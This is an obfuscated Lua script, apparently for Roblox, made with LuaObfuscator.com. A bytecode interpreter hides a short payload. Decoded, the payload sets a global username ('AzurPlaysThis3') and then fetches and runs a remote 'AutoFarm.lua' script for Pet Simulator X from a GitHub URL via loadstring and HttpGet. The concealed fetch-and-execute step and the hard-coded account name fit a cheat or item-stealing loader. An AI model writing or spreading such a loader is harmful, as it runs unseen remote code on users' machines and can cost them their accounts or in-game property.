--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=0 -(0 + 0) ;local v83;while true do if ((0 + (957 -(892 + 65)))==v82) then v83=(v31/(2^(v32-1)))%((5 -3)^(((v33-(1 -(0 -0))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=1270 -(226 + 1044) ;local v85;while true do if (v84==(568 -(367 + 201))) then v85=(8 -6)^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (118 -(32 + 85))) or ((0 -0) + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (353 -((345 -258) + 263)) );v19=v19 + (184 -(67 + (1065 -(802 + 150)))) ;v34=1;end if (v34==(1 + 0)) then return (v38 * (41190819 -24413603)) + (v37 * 65536) + (v36 * (189 + 67)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=0) then else v40=0 -0 ;v41=nil;v39=3 -2 ;end if ((1049 -(67 + 980))~=v39) then else v44=nil;v45=nil;v39=3;end if (v39~=1) then else v42=nil;v43=nil;v39=1476 -(1329 + 145) ;end if ((974 -(140 + 831))~=v39) then else v46=nil;while true do local v89=1850 -(1409 + 441) ;while true do if (v89~=0) then else local v101=718 -(15 + 703) ;while true do if (v101==1) then v89=1;break;end if ((0 + 0)~=v101) then else if (v40~=(438 -(262 + 176))) then else v41={};v42={};v43={};v40=1;end if (v40~=2) then else for v106=1,v45 do local v107=0;local v108;local v109;local v110;while true do if (v107~=(1721 -(345 + 1376))) then else v108=688 -(198 + 490) ;v109=nil;v107=1;end if (v107==(4 -3)) then v110=nil;while true do if (0~=v108) then else local v160=0 -0 ;while true do if (1==v160) then v108=1207 -(696 + 510) ;break;end if (v160~=(0 -0)) then else v109=v22();v110=nil;v160=1263 -(1091 + 171) ;end end end if (v108==1) then if (v109==(1 + 0)) then v110=v22()~=(0 -0) ;elseif (v109==2) then v110=v25();elseif (v109==3) then v110=v26();end v46[v106]=v110;break;end end break;end end end v44[3]=v22();for v111=3 -2 ,v24() do local v112=374 -(123 + 251) ;local v113;local v114;local v115;while true do if (v112==(4 -3)) then v115=nil;while true do if (0==v113) then local v162=698 -(208 + 490) ;while true do if (0~=v162) then else v114=0 + 0 ;v115=nil;v162=1;end if (v162~=1) then else v113=1 + 0 ;break;end end end if (1==v113) then while true do if (v114~=(836 -(660 + 176))) then else v115=v22();if (v21(v115,1,1)==0) then local v167=0 + 0 ;local v168;local v169;local v170;local v171;local v172;while true do if (v167~=(203 -(14 + 188))) then else v170=nil;v171=nil;v167=677 -(534 + 141) ;end if (v167==(0 + 0)) then v168=0 + 0 ;v169=nil;v167=1;end if (v167==2) then v172=nil;while true do if (v168~=(0 + 0)) then else local v173=0;while true do if (v173==(1 -0)) then v168=1;break;end if (v173~=0) then else v169=0;v170=nil;v173=1 -0 ;end end end if (v168~=1) then else local v174=0;while true do if (0~=v174) then else local v175=0 -0 ;while true do if (v175==(0 + 0)) then v171=nil;v172=nil;v175=1;end if (1~=v175) then else v174=1 + 0 ;break;end end end if (v174~=(397 -(115 + 281))) then else v168=2;break;end end end if (v168~=2) then else while true do if (v169~=1) then else local v176=0;local v177;while true do if ((0 -0)==v176) then v177=0 + 0 ;while true do if (v177==(0 -0)) then local v185=0 -0 ;local v186;while true do if ((867 -(550 + 317))~=v185) then else v186=0 -0 ;while true do if ((0 -0)~=v186) then else v172={v23(),v23(),nil,nil};if (v170==0) then local v191=0 -0 ;local v192;local v193;while true do if (v191==(1990 -(582 + 1408))) then v192=0;v193=nil;v191=1;end if (v191~=1) then else while true do if (v192==0) then v193=0 -0 ;while true do if (v193==(0 -0)) then v172[11 -8 ]=v23();v172[4]=v23();break;end end break;end end break;end end elseif (v170==1) then v172[1827 -(1195 + 629) ]=v24();elseif (v170==(2 -0)) then v172[244 -(187 + 54) ]=v24() -(2^(796 -(162 + 618))) ;elseif (v170~=(3 + 0)) then else local v196=0;while true do if (v196~=0) then else v172[2 + 1 ]=v24() -(2^(33 -17)) ;v172[6 -2 ]=v23();break;end end end v186=1 + 0 ;end if (v186==1) then v177=1637 -(1373 + 263) ;break;end end break;end end end if (v177~=1) then else v169=1002 -(451 + 549) ;break;end end break;end end end if (v169~=(0 + 0)) then else local v178=0;while true do if (v178~=1) then else v169=1 -0 ;break;end if (v178~=(0 -0)) then else local v184=0;while true do if (v184==(1385 -(746 + 638))) then v178=1 + 0 ;break;end if (v184==(0 -0)) then v170=v21(v115,343 -(218 + 123) ,1584 -(1535 + 46) );v171=v21(v115,4 + 0 ,1 + 5 );v184=1;end end end end end if (v169==3) then if (v21(v171,563 -(306 + 254) ,1 + 2 )==(1 -0)) then v172[4]=v46[v172[1471 -(899 + 568) ]];end v41[v111]=v172;break;end if (v169==(2 + 0)) then local v180=0 -0 ;local v181;while true do if (v180==0) then v181=0;while true do if (v181~=(604 -(268 + 335))) then else v169=293 -(60 + 230) ;break;end if (v181==(572 -(426 + 146))) then if (v21(v171,1 + 0 ,1457 -(282 + 1174) )~=(812 -(569 + 242))) then else v172[2]=v46[v172[2]];end if (v21(v171,5 -3 ,2)~=(1 + 0)) then else v172[3]=v46[v172[1027 -(706 + 318) ]];end v181=1;end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v112~=(1251 -(721 + 530))) then else v113=1271 -(945 + 326) ;v114=nil;v112=2 -1 ;end end end v40=3;end v101=1 + 0 ;end end end if (v89~=1) then else if (v40~=3) then else local v102=700 -(271 + 429) ;while true do if (v102==(0 + 0)) then for v116=1501 -(1408 + 92) ,v24() do v42[v116-1 ]=v29();end return v44;end end end if (v40==(1087 -(461 + 625))) then local v103=1288 -(993 + 295) ;local v104;while true do if ((0 + 0)~=v103) then else v104=0;while true do if (v104~=0) then else local v152=1171 -(418 + 753) ;while true do if (v152==0) then v44={v41,v42,nil,v43};v45=v24();v152=1;end if (v152==1) then v104=1;break;end end end if (v104==(1 + 0)) then v46={};v40=2;break;end end break;end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=530 -(406 + 123) ;local v50=(v21(v48,104 -(17 + 86) ,1789 -(1749 + 20) ) * ((1 + 0 + 1)^(1354 -((1662 -(15 + 398)) + 73)))) + v47 ;local v51=v21(v48,(1042 -(18 + 964)) -(146 -107) ,12 + 19 );local v52=((v21(v48,1177 -(466 + 679) )==((2 + 0) -1)) and  -(167 -(77 + 45 + 44))) or (2 -1) ;if (v51==(1900 -(106 + 1794))) then if (v50==(0 + 0)) then return v52 * 0 ;else v51=1 + 0 ;v49=0 -(580 -(361 + 219)) ;end elseif (v51==(2112 -(30 + 35))) then return ((v50==(0 -0)) and (v52 * ((1258 -(1043 + 214))/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(2235 -(323 + 889)) ) * (v49 + (v50/((116 -((324 -(53 + 267)) + 110))^(636 -(57 + 527))))) ;end v26=nil;function v26(v53)local v54=(0 -0) + 0 ;local v55;local v56;while true do if (v54==(0 -0)) then v55=nil;if  not v53 then local v98=0;while true do if (v98==((185 + 665) -(20 + 830))) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=1 + 0 ;end if (v54==1) then v55=v3(v16,v19,(v19 + v53) -(127 -(116 + 10)) );v19=v19 + v53 ;v54=1 + 1 ;end if (v54==(741 -(542 + (1173 -(553 + 424))))) then return v6(v56);end if (v54==(3 -1)) then v56={};for v90=1 + 0 , #v55 do v56[v90]=v2(v1(v3(v55,v90,v90)));end v54=2 + 1 ;end end end v18=5;end if (v18==2) then function v22()local v57=0;local v58;while true do if (v57==(1 -0)) then return v58;end if ((0 + 0)==v57) then v58=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v57=1;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 ;return (v60 * (147 + 109)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v86=v2(v0(v61,16));if v20 then local v92=0;local v93;while true do if (v92==0) then v93=v5(v86,v20);v20=nil;v92=1;end if (v92==1) then return v93;end end else return v86;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81==0) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81==2) then v78[v80[2]]=v80[3]~=0 ;else local v123=v80[2];local v124=v78[v80[3]];v78[v123 + 1 ]=v124;v78[v123]=v124[v80[4]];end elseif (v81<=5) then if (v81>4) then do return;end else local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v149=v128,v73 do v131=v131 + 1 ;v78[v149]=v129[v131];end end elseif (v81<=6) then v78[v80[2]]=v64[v80[3]];elseif (v81>7) then v78[v80[2]]();else local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==1) then v73=(v156 + v154) -1 ;v157=0;v153=2;end if (v153==2) then for v163=v154,v73 do local v164=0;while true do if (v164==0) then v157=v157 + 1 ;v78[v163]=v155[v157];break;end end end break;end if (v153==0) then v154=v80[2];v155,v156=v71(v78[v154](v13(v78,v154 + 1 ,v80[3])));v153=1;end end end elseif (v81<=12) then if (v81<=10) then if (v81>9) then local v134=v80[2];v78[v134]=v78[v134](v13(v78,v134 + 1 ,v73));else local v136=v80[2];v78[v136]=v78[v136](v13(v78,v136 + 1 ,v73));end elseif (v81>11) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=14) then if (v81==13) then v78[v80[2]]=v80[3];else v78[v80[2]]=v64[v80[3]];end elseif (v81<=15) then local v144=v80[2];local v145=v78[v80[3]];v78[v144 + 1 ]=v145;v78[v144]=v145[v80[4]];elseif (v81==16) then do return;end else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O0003023O005F4703083O00557365724E616D65030E3O00417A7572506C6179735468697333030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C7561000B3O0012063O00013O0030013O000200030012063O00043O001206000100053O00200F00010001000600120B000300074O0011000400014O0007000100044O000A5O00022O000C3O000100012O00103O00017O00",v9(),...);end
